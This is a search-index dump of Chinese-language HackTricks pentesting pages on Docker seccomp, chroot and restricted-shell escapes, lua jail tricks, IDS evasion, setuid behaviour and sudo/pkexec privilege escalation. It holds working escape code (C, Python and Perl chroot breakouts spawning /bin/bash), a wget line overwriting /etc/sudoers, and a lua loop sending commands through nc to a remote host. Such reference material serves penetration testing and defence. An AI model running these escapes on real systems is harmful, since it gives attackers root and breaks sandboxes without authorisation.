Docker Security » Seccomp » 基本信息","id":"1751","title":"基本信息"},"1752":{"body":"在此模式下,Seccomp 仅允许系统调用 exit()、sigreturn()、read()和write(),仅适用于已打开的文件描述符。如果进行任何其他系统调用,进程将被SIGKILL终止。 seccomp_strict.c #include \\n#include \\n#include \\n#include \\n#include \\n#include //From https://sysdig.com/blog/selinux-seccomp-falco-technical-discussion/\\n//gcc seccomp_strict.c -o seccomp_strict int main(int argc, char **argv)\\n{\\nint output = open(\\"output.txt\\", O_WRONLY);\\nconst char *val = \\"test\\"; //enables strict seccomp mode\\nprintf(\\"Calling prctl() to set seccomp strict mode...\\\\n\\");\\nprctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); //This is allowed as the file was already opened\\nprintf(\\"Writing to an already open file...\\\\n\\");\\nwrite(output, val, strlen(val)+1); //This isn\'t allowed\\nprintf(\\"Trying to open file for reading...\\\\n\\");\\nint input = open(\\"output.txt\\", O_RDONLY); printf(\\"You will not see this message--the process will be killed first\\\\n\\");\\n}","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » 原始/严格模式","id":"1752","title":"原始/严格模式"},"1753":{"body":"此模式允许 使用可配置策略过滤系统调用 ,该策略是通过伯克利数据包过滤器规则实现的。 seccomp_bpf.c #include \\n#include \\n#include \\n#include //https://security.stackexchange.com/questions/168452/how-is-sandboxing-implemented/175373\\n//gcc seccomp_bpf.c -o seccomp_bpf -lseccomp void main(void) {\\n/* initialize the libseccomp context */\\nscmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); /* allow exiting */\\nprintf(\\"Adding rule : Allow exit_group\\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); /* allow getting the current pid */\\n//printf(\\"Adding rule : Allow getpid\\\\n\\");\\n//seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); printf(\\"Adding rule : Deny getpid\\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0);\\n/* allow changing data segment size, as required by glibc */\\nprintf(\\"Adding rule : Allow brk\\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); /* allow writing up to 512 bytes to fd 1 */\\nprintf(\\"Adding rule : Allow write upto 512 bytes to FD 1\\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2,\\nSCMP_A0(SCMP_CMP_EQ, 1),\\nSCMP_A2(SCMP_CMP_LE, 512)); /* if writing to any other fd, return -EBADF */\\nprintf(\\"Adding rule : Deny write to any FD except 1 \\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1,\\nSCMP_A0(SCMP_CMP_NE, 1)); /* load and enforce the filters */\\nprintf(\\"Load rules and enforce \\\\n\\");\\nseccomp_load(ctx);\\nseccomp_release(ctx);\\n//Get the getpid is denied, a weird number will be returned like\\n//this process is -9\\nprintf(\\"this process is %d\\\\n\\", getpid());\\n}","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » Seccomp-bpf","id":"1753","title":"Seccomp-bpf"},"1754":{"body":"Seccomp-bpf 被 Docker 支持,以有效限制来自容器的 syscalls ,从而减少攻击面。您可以在 https://docs.docker.com/engine/security/seccomp/ 找到 默认 被 阻止的 syscalls ,而 默认 seccomp 配置文件 可以在这里找到 https://github.com/moby/moby/blob/master/profiles/seccomp/default.json 。 您可以使用以下命令运行具有 不同 seccomp 策略的 docker 容器: bash docker run --rm \\\\\\n-it \\\\\\n--security-opt seccomp=/path/to/seccomp/profile.json \\\\\\nhello-world 如果你想例如 禁止 一个容器执行某些 syscall ,像uname,你可以从 https://github.com/moby/moby/blob/master/profiles/seccomp/default.json 下载默认配置文件,然后 从列表中移除uname字符串 。 如果你想确保 某个二进制文件在docker容器内无法工作 ,你可以使用strace列出该二进制文件使用的syscalls,然后禁止它们。 在以下示例中,发现了uname的 syscalls : bash docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname note 如果您仅仅是使用 Docker 启动一个应用程序 ,您可以使用 strace 对其进行 分析 ,并 仅允许它所需的系统调用","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » Seccomp in Docker","id":"1754","title":"Seccomp in Docker"},"1755":{"body":"Example from here 为了说明 Seccomp 功能,让我们创建一个 Seccomp 配置文件,禁用“chmod”系统调用,如下所示。 json {\\n\\"defaultAction\\": \\"SCMP_ACT_ALLOW\\",\\n\\"syscalls\\": [\\n{\\n\\"name\\": \\"chmod\\",\\n\\"action\\": \\"SCMP_ACT_ERRNO\\"\\n}\\n]\\n} 在上述配置中,我们将默认操作设置为“允许”,并创建了一个黑名单以禁用“chmod”。为了更安全,我们可以将默认操作设置为丢弃,并创建一个白名单以选择性地启用系统调用。 以下输出显示“chmod”调用返回错误,因为它在seccomp配置中被禁用。 bash $ docker run --rm -it --security-opt seccomp:/home/smakam14/seccomp/profile.json busybox chmod 400 /etc/hosts\\nchmod: /etc/hosts: Operation not permitted 以下输出显示了“docker inspect”显示的配置文件: json \\"SecurityOpt\\": [\\n\\"seccomp:{\\\\\\"defaultAction\\\\\\":\\\\\\"SCMP_ACT_ALLOW\\\\\\",\\\\\\"syscalls\\\\\\":[{\\\\\\"name\\\\\\":\\\\\\"chmod\\\\\\",\\\\\\"action\\\\\\":\\\\\\"SCMP_ACT_ERRNO\\\\\\"}]}\\"\\n] tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » 示例 Seccomp 策略","id":"1755","title":"示例 Seccomp 策略"},"1756":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » Weaponizing Distroless","id":"1756","title":"Weaponizing Distroless"},"1757":{"body":"Distroless 容器是一种只包含 运行特定应用程序所需的必要依赖项 的容器,不包含任何不必要的软件或工具。这些容器旨在尽可能 轻量 和 安全 ,并旨在通过移除任何不必要的组件来 最小化攻击面 。 Distroless 容器通常用于 安全性和可靠性至关重要的生产环境 。 一些 distroless 容器 的 示例 包括: 由 Google 提供: https://console.cloud.google.com/gcr/images/distroless/GLOBAL 由 Chainguard 提供: https://github.com/chainguard-images/images/tree/main/images","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » 什么是 Distroless","id":"1757","title":"什么是 Distroless"},"1758":{"body":"武器化 distroless 容器的目标是能够 在 distroless 所带来的限制 (系统中缺乏常见二进制文件)下 执行任意二进制文件和有效负载 ,以及容器中常见的保护措施,如 只读 或 不可执行 在 /dev/shm 中。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » 武器化 Distroless","id":"1758","title":"武器化 Distroless"},"1759":{"body":"将在 2023 年的某个时候发布...","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » 通过内存","id":"1759","title":"通过内存"},"176":{"body":"只需将数据包分片并发送。如果 IDS/IPS 没有重组它们的能力,它们将到达最终主机。 Nmap 选项: -f","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 分片数据包","id":"176","title":"分片数据包"},"1760":{"body":"openssl **** 在这篇文章中, 解释了二进制文件 openssl 经常出现在这些容器中,可能是因为它是 运行在容器内的软件所需 的。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » 通过现有二进制文件","id":"1760","title":"通过现有二进制文件"},"1761":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 从监狱中逃脱","id":"1761","title":"从监狱中逃脱"},"1762":{"body":"在 https://gtfobins.github.io/ 中搜索是否可以执行任何具有 \\"Shell\\" 属性的二进制文件","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » GTFOBins","id":"1762","title":"GTFOBins"},"1763":{"body":"来自 wikipedia :chroot 机制 并不旨在防御 来自 特权 ( root ) 用户 的故意篡改。在大多数系统中,chroot 上下文无法正确堆叠,具有足够权限的 chroot 程序 可能会执行第二次 chroot 以突破 。 通常这意味着要逃脱,你需要在 chroot 内部是 root。 tip 工具 chw00t 是为了滥用以下场景并从 chroot 中逃脱而创建的。","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Chroot 逃逸","id":"1763","title":"Chroot 逃逸"},"1764":{"body":"warning 如果你在 chroot 内部是 root ,你 可以逃脱 ,通过创建 另一个 chroot 。这是因为两个 chroot 不能共存(在 Linux 中),所以如果你创建一个文件夹,然后 在那个新文件夹上创建一个新的 chroot ,而你 在外面 ,你现在将 在新的 chroot 之外 ,因此你将处于文件系统中。 这发生是因为通常 chroot 并不会将你的工作目录移动到指定的目录,所以你可以创建一个 chroot,但在它外面。 通常你不会在 chroot 监狱中找到 chroot 二进制文件,但你 可以编译、上传并执行 一个二进制文件: C: break_chroot.c\\nc #include \\n#include \\n#include //gcc break_chroot.c -o break_chroot int main(void)\\n{\\nmkdir(\\"chroot-dir\\", 0755);\\nchroot(\\"chroot-dir\\");\\nfor(int i = 0; i < 1000; i++) {\\nchdir(\\"..\\");\\n}\\nchroot(\\".\\");\\nsystem(\\"/bin/bash\\");\\n} Python\\npython #!/usr/bin/python\\nimport os\\nos.mkdir(\\"chroot-dir\\")\\nos.chroot(\\"chroot-dir\\")\\nfor i in range(1000):\\nos.chdir(\\"..\\")\\nos.chroot(\\".\\")\\nos.system(\\"/bin/bash\\") Perl\\nperl #!/usr/bin/perl\\nmkdir \\"chroot-dir\\";\\nchroot \\"chroot-dir\\";\\nforeach my $i (0..1000) {\\nchdir \\"..\\"\\n}\\nchroot \\".\\";\\nsystem(\\"/bin/bash\\");","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + CWD","id":"1764","title":"Root + CWD"},"1765":{"body":"warning 这与之前的情况类似,但在这种情况下, 攻击者将当前目录的文件描述符存储起来 ,然后 在新文件夹中创建 chroot 。最后,由于他对该 FD 在 chroot 外部 的 访问 ,他访问它并 逃脱 。 C: break_chroot.c\\nc #include \\n#include \\n#include //gcc break_chroot.c -o break_chroot int main(void)\\n{\\nmkdir(\\"tmpdir\\", 0755);\\ndir_fd = open(\\".\\", O_RDONLY);\\nif(chroot(\\"tmpdir\\")){\\nperror(\\"chroot\\");\\n}\\nfchdir(dir_fd);\\nclose(dir_fd);\\nfor(x = 0; x < 1000; x++) chdir(\\"..\\");\\nchroot(\\".\\");\\n}","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + Saved fd","id":"1765","title":"Root + Saved fd"},"1766":{"body":"warning FD 可以通过 Unix Domain Sockets 传递,因此: 创建一个子进程 (fork) 创建 UDS 以便父进程和子进程可以通信 在子进程中在不同的文件夹中运行 chroot 在父进程中,创建一个在新子进程 chroot 之外的文件夹的 FD 通过 UDS 将该 FD 传递给子进程 子进程 chdir 到该 FD,因为它在其 chroot 之外,它将逃脱监禁","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + Fork + UDS (Unix Domain Sockets)","id":"1766","title":"Root + Fork + UDS (Unix Domain Sockets)"},"1767":{"body":"warning 将根设备 (/) 挂载到 chroot 内的一个目录 进入该目录的 chroot 这在 Linux 中是可能的","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + Mount","id":"1767","title":"Root + Mount"},"1768":{"body":"warning 将 procfs 挂载到 chroot 内的一个目录 (如果尚未挂载) 查找具有不同 root/cwd 条目的 pid,例如:/proc/1/root 进入该条目的 chroot","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + /proc","id":"1768","title":"Root + /proc"},"1769":{"body":"warning 创建一个 Fork (子进程) 并 chroot 到文件系统中更深的不同文件夹并在其上 CD 从父进程中,将子进程所在的文件夹移动到子进程 chroot 之前的文件夹 这个子进程将发现自己在 chroot 之外","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root(?) + Fork","id":"1769","title":"Root(?) + Fork"},"177":{"body":"传感器通常出于性能原因不计算校验和。因此,攻击者可以发送一个数据包,该数据包将被 传感器解释但被最终主机拒绝。 示例: 发送一个带有 RST 标志和无效校验和的数据包,因此,IPS/IDS 可能认为该数据包将关闭连接,但最终主机将丢弃该数据包,因为校验和无效。","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 无效 校验和","id":"177","title":"无效 校验和"},"1770":{"body":"warning 以前用户可以从自己的进程调试自己的进程……但这在默认情况下不再可能 无论如何,如果可能的话,你可以 ptrace 进入一个进程并在其中执行 shellcode ( 见此示例 )。","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » ptrace","id":"1770","title":"ptrace"},"1771":{"body":"","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Bash Jails","id":"1771","title":"Bash Jails"},"1772":{"body":"获取关于监禁的信息: bash echo $SHELL\\necho $PATH\\nenv\\nexport\\npwd","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Enumeration","id":"1772","title":"Enumeration"},"1773":{"body":"检查您是否可以修改 PATH 环境变量 bash echo $PATH #See the path of the executables that you can use\\nPATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path\\necho /home/* #List directory","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 修改 PATH","id":"1773","title":"修改 PATH"},"1774":{"body":"bash :set shell=/bin/sh\\n:shell","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 使用 vim","id":"1774","title":"使用 vim"},"1775":{"body":"检查您是否可以创建一个以 /bin/bash 为内容的可执行文件 bash red /bin/bash\\n> w wx/path #Write /bin/bash in a writable and executable path","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 创建脚本","id":"1775","title":"创建脚本"},"1776":{"body":"如果您通过ssh访问,可以使用这个技巧来执行bash shell: bash ssh -t user@ bash # Get directly an interactive shell\\nssh user@ -t \\"bash --noprofile -i\\"\\nssh user@ -t \\"() { :; }; sh -i \\"","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 从SSH获取bash","id":"1776","title":"从SSH获取bash"},"1777":{"body":"bash declare -n PATH; export PATH=/bin;bash -i BASH_CMDS[shell]=/bin/bash;shell -i","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 声明","id":"1777","title":"声明"},"1778":{"body":"您可以覆盖例如 sudoers 文件 bash wget http://127.0.0.1:8080/sudoers -O /etc/sudoers","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Wget","id":"1778","title":"Wget"},"1779":{"body":"https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/ https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells https://gtfobins.github.io 这页也可能很有趣: Bypass Linux Restrictions","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 其他技巧","id":"1779","title":"其他技巧"},"178":{"body":"传感器可能会忽略某些标志和选项设置在 IP 和 TCP 头中的数据包,而目标主机在接收时接受该数据包。","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 不常见的 IP 和 TCP 选项","id":"178","title":"不常见的 IP 和 TCP 选项"},"1780":{"body":"关于从 python 监狱中逃脱的技巧在以下页面: Bypass Python sandboxes","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Python 监狱","id":"1780","title":"Python 监狱"},"1781":{"body":"在此页面中,您可以找到您在 lua 中可以访问的全局函数: https://www.gammon.com.au/scripts/doc.php?general=lua_base 带命令执行的 Eval: bash load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))() 一些技巧来 调用库的函数而不使用点 : bash print(string.char(0x41, 0x42))\\nprint(rawget(string, \\"char\\")(0x41, 0x42)) 列举库的函数: bash for k,v in pairs(string) do print(k,v) end 请注意,每次在 不同的lua环境中执行前面的单行代码时,函数的顺序会改变 。因此,如果您需要执行一个特定的函数,可以通过加载不同的lua环境并调用le library的第一个函数来进行暴力攻击: bash #In this scenario you could BF the victim that is generating a new lua environment\\n#for every interaction with the following line and when you are lucky\\n#the char function is going to be executed\\nfor k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end #This attack from a CTF can be used to try to chain the function execute from \\"os\\" library\\n#and \\"char\\" from string library, and the use both to execute a command\\nfor i in seq 1000; do echo \\"for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end\\" | nc 10.10.10.10 10006 | grep -A5 \\"Code: char\\"; done 获取交互式 lua shell : 如果你在一个受限的 lua shell 中,可以通过调用来获取一个新的 lua shell(希望是无限的): bash debug.debug()","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Lua 监狱","id":"1781","title":"Lua 监狱"},"1782":{"body":"https://www.youtube.com/watch?v=UO618TeyCWo (幻灯片: https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf ) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 参考","id":"1782","title":"参考"},"1783":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » euid, ruid, suid","id":"1783","title":"euid, ruid, suid"},"1784":{"body":"ruid : 真实用户 ID 表示发起进程的用户。 euid : 被称为 有效用户 ID ,它代表系统用来确定进程权限的用户身份。通常情况下,euid 与 ruid 相同,除非在执行 SetUID 二进制文件的情况下,euid 采用文件所有者的身份,从而授予特定的操作权限。 suid : 这个 保存的用户 ID 在高权限进程(通常以 root 身份运行)需要暂时放弃其权限以执行某些任务时至关重要,之后再恢复其最初的提升状态。 重要说明 非 root 进程只能将其 euid 修改为当前的 ruid、euid 或 suid。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » 用户标识变量","id":"1784","title":"用户标识变量"},"1785":{"body":"setuid : 与最初的假设相反,setuid 主要修改 euid 而不是 ruid。具体而言,对于特权进程,它将 ruid、euid 和 suid 与指定用户(通常是 root)对齐,有效地巩固这些 ID,因为 suid 的覆盖。详细信息可以在 setuid man page 中找到。 setreuid 和 setresuid : 这些函数允许对 ruid、euid 和 suid 进行细致的调整。然而,它们的能力取决于进程的权限级别。对于非 root 进程,修改仅限于当前的 ruid、euid 和 suid 值。相比之下,root 进程或具有 CAP_SETUID 能力的进程可以为这些 ID 分配任意值。更多信息可以从 setresuid man page 和 setreuid man page 中获取。 这些功能并不是作为安全机制设计的,而是为了促进预期的操作流程,例如当程序通过更改其有效用户 ID 来采用另一个用户的身份时。 值得注意的是,虽然 setuid 可能是提升到 root 权限的常用方法(因为它将所有 ID 对齐到 root),但区分这些函数对于理解和操控不同场景下的用户 ID 行为至关重要。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » 理解 set*uid 函数","id":"1785","title":"理解 set*uid 函数"},"1786":{"body":"execve 系统调用 功能 : execve 启动一个程序,由第一个参数决定。它接受两个数组参数,argv 用于参数,envp 用于环境。 行为 : 它保留调用者的内存空间,但刷新堆栈、堆和数据段。程序的代码被新程序替换。 用户 ID 保持 : ruid、euid 和附加的组 ID 保持不变。 如果新程序设置了 SetUID 位,euid 可能会有细微变化。 suid 在执行后从 euid 更新。 文档 : 详细信息可以在 execve man page 中找到。 system 函数 功能 : 与 execve 不同,system 使用 fork 创建一个子进程,并在该子进程中执行命令,使用 execl。 命令执行 : 通过 sh 执行命令,使用 execl(\\"/bin/sh\\", \\"sh\\", \\"-c\\", command, (char *) NULL);。 行为 : 由于 execl 是 execve 的一种形式,它在新子进程的上下文中以类似方式操作。 文档 : 进一步的见解可以从 system man page 中获取。 带有 SUID 的 bash 和 sh 的行为 bash : 有一个 -p 选项影响 euid 和 ruid 的处理方式。 如果没有 -p,bash 会将 euid 设置为 ruid,如果它们最初不同。 如果有 -p,则保留初始的 euid。 更多细节可以在 bash man page 中找到。 sh : 没有类似于 bash 中的 -p 的机制。 关于用户 ID 的行为没有明确提及,除了在 -i 选项下,强调保留 euid 和 ruid 的相等性。 额外信息可在 sh man page 中找到。 这些机制在操作上各不相同,为执行和程序之间的转换提供了多种选择,具体细节在用户 ID 的管理和保留方面有所不同。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » Linux 中的程序执行机制","id":"1786","title":"Linux 中的程序执行机制"},"1787":{"body":"示例取自 https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail,查看以获取更多信息 案例 1: 使用 setuid 和 system 目标 : 理解 setuid 与 system 和 bash 作为 sh 结合的效果。 C 代码 : c #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nsetuid(1000);\\nsystem(\\"id\\");\\nreturn 0;\\n} 编译和权限: bash oxdf@hacky$ gcc a.c -o /mnt/nfsshare/a;\\noxdf@hacky$ chmod 4755 /mnt/nfsshare/a bash bash-4.2$ $ ./a\\nuid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 分析: ruid 和 euid 初始值分别为 99(nobody)和 1000(frank)。 setuid 将两者对齐到 1000。 system 执行 /bin/bash -c id,这是由于 sh 到 bash 的符号链接。 bash 在没有 -p 的情况下,将 euid 调整为与 ruid 匹配,导致两者均为 99(nobody)。 案例 2:使用 setreuid 和 system C 代码 : c #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nsetreuid(1000, 1000);\\nsystem(\\"id\\");\\nreturn 0;\\n} 编译和权限: bash oxdf@hacky$ gcc b.c -o /mnt/nfsshare/b; chmod 4755 /mnt/nfsshare/b 执行和结果: bash bash-4.2$ $ ./b\\nuid=1000(frank) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 分析: setreuid 将 ruid 和 euid 都设置为 1000。 system 调用 bash,由于用户 ID 的相等性,保持用户 ID,有效地作为 frank 操作。 案例 3:使用 setuid 和 execve 目标:探索 setuid 和 execve 之间的交互。 bash #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nsetuid(1000);\\nexecve(\\"/usr/bin/id\\", NULL, NULL);\\nreturn 0;\\n} 执行和结果: bash bash-4.2$ $ ./c\\nuid=99(nobody) gid=99(nobody) euid=1000(frank) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 分析: ruid 保持为 99,但 euid 设置为 1000,符合 setuid 的效果。 C 代码示例 2(调用 Bash): bash #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nsetuid(1000);\\nexecve(\\"/bin/bash\\", NULL, NULL);\\nreturn 0;\\n} 执行和结果: bash bash-4.2$ $ ./d\\nbash-4.2$ $ id\\nuid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 分析: 尽管 euid 通过 setuid 设置为 1000,bash 由于缺少 -p 将 euid 重置为 ruid (99)。 C 代码示例 3 (使用 bash -p): bash #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nchar *const paramList[10] = {\\"/bin/bash\\", \\"-p\\", NULL};\\nsetuid(1000);\\nexecve(paramList[0], paramList, NULL);\\nreturn 0;\\n} 执行和结果: bash bash-4.2$ $ ./e\\nbash-4.2$ $ id\\nuid=99(nobody) gid=99(nobody) euid=100","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » 测试执行中的用户 ID 行为","id":"1787","title":"测试执行中的用户 ID 行为"},"1788":{"body":"https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » 参考","id":"1788","title":"参考"},"1789":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » 有趣的组 - Linux 权限提升","id":"1789","title":"有趣的组 - Linux 权限提升"},"179":{"body":"当你分片一个数据包时,可能会存在某种重叠(也许数据包 2 的前 8 字节与数据包 1 的最后 8 字节重叠,数据包 2 的最后 8 字节与数据包 3 的前 8 字节重叠)。然后,如果 IDS/IPS 以不同于最终主机的方式重组它们,将会解释为不同的数据包。 或者,也许,两个具有相同偏移量的数据包到达,主机必须决定选择哪个。 BSD : 优先选择偏移量较小的数据包。对于具有相同偏移量的数据包,将选择第一个。 Linux : 像 BSD,但它更喜欢具有相同偏移量的最后一个数据包。 First (Windows): 第一个到达的值,保持该值。 Last (cisco): 最后到达的值,保持该值。","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 重叠","id":"179","title":"重叠"},"1790":{"body":"","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Sudo/管理员组","id":"1790","title":"Sudo/管理员组"},"1791":{"body":"有时 ,**默认情况下(或因为某些软件需要它)**在 /etc/sudoers 文件中可以找到一些这样的行: bash # Allow members of group sudo to execute any command\\n%sudo\\tALL=(ALL:ALL) ALL # Allow members of group admin to execute any command\\n%admin ALL=(ALL:ALL) ALL 这意味着 任何属于sudo或admin组的用户都可以以sudo身份执行任何操作 。 如果是这种情况,要 成为root,你只需执行 : sudo su","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » PE - 方法 1","id":"1791","title":"PE - 方法 1"},"1792":{"body":"查找所有 suid 二进制文件,并检查是否存在二进制文件 Pkexec : bash find / -perm -4000 2>/dev/null 如果你发现二进制文件 pkexec 是一个 SUID 二进制文件 ,并且你属于 sudo 或 admin ,你可能可以使用 pkexec 以 sudo 身份执行二进制文件。 这是因为通常这些是 polkit 策略 中的组。该策略基本上确定了哪些组可以使用 pkexec。使用以下命令检查: bash cat /etc/polkit-1/localauthority.conf.d/* 在这里你会发现哪些组被允许执行 pkexec ,并且在某些 Linux 发行版中, sudo 和 admin 组默认出现。 要 成为 root,你可以执行 : bash pkexec \\"/bin/sh\\" #You will be prompted for your user password 如果您尝试执行 pkexec 并且收到此 错误 : bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie\\n==== AUTHENTICATION FAILED ===\\nError executing 